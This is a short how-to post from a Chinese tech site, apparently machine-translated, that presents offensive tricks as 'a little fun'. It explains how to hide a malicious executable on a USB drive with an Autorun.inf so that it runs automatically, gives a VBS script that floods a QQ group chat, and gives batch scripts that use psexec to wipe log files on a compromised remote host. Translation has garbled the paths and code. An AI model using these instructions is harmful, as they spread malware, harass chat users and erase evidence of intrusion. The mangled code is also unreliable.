Get the App
SLTechnology News&Howtos  ›  Network Security  › 

Malicious files a little fun

Shulou Source: shulou.com Published: 2022-06-01 07:30:25 10月03日 Update

1. Put the executable malicious file into the U disk. And set the hide.

2. Create a file Autorun.inf

3. Write content:

[AutoRun] full name of OPEN= malicious file shellexecute= full name of malicious file shell\ Atuo\ command= full name of malicious file

Hide this file.

4. When the U disk is inserted into a new device and the operator double-clicks the U disk icon to view the U disk, the malicious file will be run automatically.

VBS script, QQ group chat and screen brushing:

Create a new vbs suffix file. The contents are as follows:

Set WshShell= WScript.CreateObject ("WScript.Shell") WshShell.AppActivate "group chat screen brushing test" for iTunes 1 to 10 WScript.Sleep 500WshShell.SendKeys "^ v" WshShell.SendKeys iWshShell.SendKeys "% s" Next

The # for i=1to 10 "statement is used to control the number of times it is sent, indicating that it is sent 10 times.

Open a group chat window and copy the content you want to send to the clipboard, double-click the "qq.vbs" you just generated to switch to the group chat window, where you can see that the screen has been brushed automatically.

Log cleanup:

Create a new del.bat script

@ del del c:winntsystem32*.log del c:winntsystem32*.log @ del c:winntsystem32*.txt @ del c:winnt*.txt @ del c:winnt*.log @ del c:del.bat

Create a new clean.bat

@ copy del.bat\ $@ echo copy the native del.bat to the broiler. OK @ psexec\% 1 c:del.bat @ echo runs del.bat on the broiler to clear the log file. OK

Tags: File malicious full name content log chicken script run person clipboard suffix icon skylight times device statement native switch cut and paste control Apple Docker Huawei Linux macOS MariaDB Microsoft MySQL NVidia OPPO Reno OPPO Reno MySQL vpn MariaDB Redmi